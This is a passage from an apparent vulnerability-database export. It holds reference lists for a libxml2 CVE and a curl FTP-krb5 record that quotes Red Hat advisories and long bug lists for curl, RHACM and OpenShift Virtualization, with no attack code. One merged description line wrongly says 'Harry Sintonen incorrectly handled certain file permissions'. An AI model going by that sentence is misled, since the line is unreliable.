"url": "https://access.redhat.com/security/cve/cve-2022-44617"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2868"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2867"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0466"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0467"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0468"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213505."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-0923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-4415"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0977"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42867"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42866"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42845"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42865"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42863"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42864"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42852"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht204641"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213536."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42837"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42859"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "169857"
},
{
"db": "PACKETSTORM",
"id": "171173"
},
{
"db": "PACKETSTORM",
"id": "170318"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-429438",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-40304",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169857",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171173",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170318",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-40304",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-11-23T00:00:00",
"db": "VULHUB",
"id": "VHN-429438",
"ident": null
},
{
"date": "2023-03-09T15:14:10",
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"date": "2023-01-26T15:34:56",
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"date": "2023-01-26T15:34:49",
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"date": "2023-01-24T16:30:22",
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"date": "2023-01-26T15:35:03",
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"date": "2022-11-15T16:42:23",
"db": "PACKETSTORM",
"id": "169857",
"ident": null
},
{
"date": "2023-02-28T17:09:39",
"db": "PACKETSTORM",
"id": "171173",
"ident": null
},
{
"date": "2022-12-22T02:13:22",
"db": "PACKETSTORM",
"id": "170318",
"ident": null
},
{
"date": "2022-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"ident": null
},
{
"date": "2022-11-23T18:15:12.167000",
"db": "NVD",
"id": "CVE-2022-40304",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-23T00:00:00",
"db": "VULHUB",
"id": "VHN-429438",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"ident": null
},
{
"date": "2025-04-28T20:15:19.607000",
"db": "NVD",
"id": "CVE-2022-40304",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libxml2 Code problem vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
],
"trust": 0.6
}
}
VAR-202206-1961
Vulnerability from variot - Updated: 2026-04-10 23:24When curl < 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client. Harry Sintonen incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: curl security update Advisory ID: RHSA-2022:6159-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:6159 Issue date: 2022-08-24 CVE Names: CVE-2022-32206 CVE-2022-32208 ==================================================================== 1. Summary:
An update for curl is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
-
curl: HTTP compression denial of service (CVE-2022-32206)
-
curl: FTP-KRB bad message verification (CVE-2022-32208)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: curl-7.61.1-22.el8_6.4.src.rpm
aarch64: curl-7.61.1-22.el8_6.4.aarch64.rpm curl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm curl-debugsource-7.61.1-22.el8_6.4.aarch64.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm libcurl-7.61.1-22.el8_6.4.aarch64.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm libcurl-devel-7.61.1-22.el8_6.4.aarch64.rpm libcurl-minimal-7.61.1-22.el8_6.4.aarch64.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm
ppc64le: curl-7.61.1-22.el8_6.4.ppc64le.rpm curl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm curl-debugsource-7.61.1-22.el8_6.4.ppc64le.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-devel-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-minimal-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm
s390x: curl-7.61.1-22.el8_6.4.s390x.rpm curl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm curl-debugsource-7.61.1-22.el8_6.4.s390x.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm libcurl-7.61.1-22.el8_6.4.s390x.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm libcurl-devel-7.61.1-22.el8_6.4.s390x.rpm libcurl-minimal-7.61.1-22.el8_6.4.s390x.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm
x86_64: curl-7.61.1-22.el8_6.4.x86_64.rpm curl-debuginfo-7.61.1-22.el8_6.4.i686.rpm curl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm curl-debugsource-7.61.1-22.el8_6.4.i686.rpm curl-debugsource-7.61.1-22.el8_6.4.x86_64.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm libcurl-7.61.1-22.el8_6.4.i686.rpm libcurl-7.61.1-22.el8_6.4.x86_64.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm libcurl-devel-7.61.1-22.el8_6.4.i686.rpm libcurl-devel-7.61.1-22.el8_6.4.x86_64.rpm libcurl-minimal-7.61.1-22.el8_6.4.i686.rpm libcurl-minimal-7.61.1-22.el8_6.4.x86_64.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYwa9b9zjgjWX9erEAQi1rQ/+Kw4R4cPAIlGUx4vJwSMw8zwCDxnLviV+ YgCpaCuUwCkWI9hrAQNC1O5i2MSl7j8jI9dt0Oe770VwNIZPzJMK8MX96zYdeOsg EiuwTW5KTWKwCeAvPt6ydVji9R0N7FMDBxmdi1aE8gBt8J6pIwp4ozrR4jXiXCjB dQJlc2kf7YXDiengte1jpXNCFh2ar9t8lqmW53Hu05zR8VFdAPk6NM1kTIploICN blR9t80TbWouBvN2A6gIZ0ZWnbJOY9odCBHdo5ay8kufmQC0K9QKb7jyoaUUHVau 5/HVbncd7bFQuyu+yGoOxU1TCxwee3B9LAmR4uzDdJcaTxPgvK2cyskdTVz+9N9k nJLDYGaL7UNC7YkbByN58VC6fdGsnn8QIXHg7ICTgdhYiPZ3uP5JUiDrAGKKb/v+ XPtwYHuh6yX0OfS0JqFEMjR0P1rFLiuDNBOPBDiTV2mBVd+7kiNTs1izUDGwQeFd VaNNNU4kpD3FGOgRwxIAKz2qCX+Ody8goBeJJPGcVlmDp025ZrMisl1QC8/3eTas ML+TSvTeaSY/I35uPzKsoh1f+/lAwUsB54I6NxHH3vWYryievuSdpjtNsQInACjw owX+pU5CfOwdD56Hqdhb7fjuJVufo6VC8b0zy/vSZYnNt0cfojXA73F3B1K5+XcF bBkTeh+fqsg=powM -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat Advanced Cluster Management for Kubernetes 2.3.12 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security fix:
- CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
Bug fixes:
-
Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)
-
RHACM 2.3.12 images (BZ# 2101411)
-
Bugs fixed (https://bugzilla.redhat.com/):
2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation 2101411 - RHACM 2.3.12 images 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
- Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
-
golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
-
kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
-
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
-
golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
-
golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
-
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
-
golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
-
golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
-
golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
-
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
-
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
-
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
-
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
-
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
-
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89
- Bugs fixed (https://bugzilla.redhat.com/):
1719190 - Unable to cancel live-migration if virt-launcher pod in pending state
2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2040377 - Unable to delete failed VMIM after VM deleted
2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed
2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value
2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
2060499 - [RFE] Cannot add additional service (or other objects) to VM template
2069098 - Large scale |VMs migration is slow due to low migration parallelism
2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2071491 - Storage Throughput metrics are incorrect in Overview
2072797 - Metrics in Virtualization -> Overview period is not clear or configurable
2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers
2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode
2086551 - Min CPU feature found in labels
2087724 - Default template show no boot source even there are auto-upload boot sources
2088129 - [SSP] webhook does not comply with restricted security context
2088464 - [CDI] cdi-deployment does not comply with restricted security context
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2089744 - HCO should label its control plane namespace to admit pods at privileged security level
2089751 - 4.12.0 containers
2089804 - 4.12.0 rpms
2091856 - ?Edit BootSource? action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer
2093771 - The disk source should be PVC if the template has no auto-update boot source
2093996 - kubectl get vmi API should always return primary interface if exist
2094202 - Cloud-init username field should have hint
2096285 - KubeVirt CR API documentation is missing docs for many fields
2096780 - [RFE] Add ssh-key and sysprep to template scripts tab
2097436 - Online disk expansion ignores filesystem overhead change
2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP
2099556 - [RFE] Add option to enable RDP service for windows vm
2099573 - [RFE] Improve template's message about not editable
2099923 - [RFE] Merge "SSH access" and "SSH command" into one
2100290 - Error is not dismissed on catalog review page
2100436 - VM list filtering ignores VMs in error-states
2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2100629 - Update nested support KBASE article
2100679 - The number of hardware devices is not correct in vm overview tab
2100682 - All hardware devices get deleted while just delete one
2100684 - Workload profile are not editable during creation and after creation
2101144 - VM filter has two "Other" checkboxes which are triggered together
2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode
2101167 - Edit buttons clickable area is too large.
2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id
2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state
2101390 - Easy to miss the "tick" when adding GPU device to vm via UI
2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id
2101423 - wrong user name on using ignition
2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page
2101445 - "Pending changes - Boot Order"
2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user
2101499 - Cannot add NIC to VM template as non-priv user
2101501 - NAME parameter in VM template has no effect.
2101628 - non-priv user cannot load dataSource while edit template's rootdisk
2101667 - VMI view is not aligned with vm and tempates
2101681 - All templates are labeling "source available" in template list page
2102074 - VM Creation time on VM Overview Details card lacks string
2102125 - vm clone modal is displaying DV size instead of PVC size
2102132 - align the utilization card of single VM overview with the design
2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"?
2102256 - Add button moved to right
2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal
2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other'
2102561 - sysprep-info should link to downstream doc
2102737 - Clone a VM should lead to vm overview tab
2102740 - "Save" button on vm clone modal should be "Clone"
2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab
2103807 - PVC is not named by VM name while creating vm quickly
2103817 - Workload profile values in vm details should align with template's value
2103844 - VM nic model is empty
2104331 - VM list page scroll up automatically
2104402 - VM create button is not enabled while adding multiple environment disks
2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed
2104424 - Enable descheduler or hide it on template's scheduling tab
2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted
2104480 - Alerts in VM overview tab disappeared after a few seconds
2104785 - "Add disk" and "Disks" are on the same line
2104859 - [RFE] Add "Copy SSH command" to VM action list
2105257 - Can't set log verbosity level for virt-operator pod
2106175 - All pages are crashed after visit Virtualization -> Overview
2106963 - Cannot add configmap for windows VM
2107279 - VM Template's bootable disk can be marked as bootable
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2108339 - datasource does not provide timestamp when updated
2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed
2109818 - Upstream metrics documentation is not detailed enough
2109975 - DataVolume fails to import "cirros-container-disk-demo" image
2110256 - Storage -> PVC -> upload data, does not support source reference
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2111240 - GiB changes to B in Template's Edit boot source reference modal
2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics
2111328 - kubevirt plugin console crashed after visit vmi page
2111378 - VM SSH command generated by UI points at api VIP
2111744 - Cloned template should not label app.kubernetes.io/name: common-templates
2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi)
2112900 - button style are different
2114516 - Nothing happens after clicking on Fedora cloud image list link
2114636 - The style of displayed items are not unified on VM tabs
2114683 - VM overview tab is crashed just after the vm is created
2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12
2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items
2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates
2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF'
2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found"
2117549 - Cannot edit cloud-init data after add ssh key
2117803 - Cannot edit ssh even vm is stopped
2117813 - Improve descriptive text of VM details while VM is off
2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs
2118257 - outdated doc link tolerations modal
2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format
2119069 - Unable to start windows VMs on PSI setups
2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2119309 - readinessProbe in VM stays on failed
2119615 - Change the disk size causes the unit changed
2120907 - Cannot filter disks by label
2121320 - Negative values in migration metrics
2122236 - Failing to delete HCO with SSP sticking around
2122990 - VMExport should check APIGroup
2124147 - "ReadOnlyMany" should not be added to supported values in memory dump
2124307 - Ui crash/stuck on loading when trying to detach disk on a VM
2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it
2124555 - View documentation link on MigrationPolicies page des not work
2124557 - MigrationPolicy description is not displayed on Details page
2124558 - Non-privileged user can start MigrationPolicy creation
2124565 - Deleted DataSource reappears in list
2124572 - First annotation can not be added to DataSource
2124582 - Filtering VMs by OS does not work
2124594 - Docker URL validation is inconsistent over application
2124597 - Wrong case in Create DataSource menu
2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile
2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state
2127787 - Expose the PVC source of the dataSource on UI
2127843 - UI crashed by selecting "Live migration network"
2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes
2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer
2128002 - Error after VM template deletion
2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards
2128872 - [4.11]Can't restore cloned VM
2128948 - Cannot create DataSource from default YAML
2128949 - Cannot create MigrationPolicy from example YAML
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129234 - Service is not deleted along with the VM when the VM is created from a template with service
2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data'
2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook
2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV
2130588 - crypto-policy : Common Ciphers support by apiserver and hco
2130695 - crypto-policy : Logging Improvement and publish the source of ciphers
2130909 - Non-privileged user can start DataSource creation
2131157 - KV data transfer rate chart in VM Metrics tab is not displayed
2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough
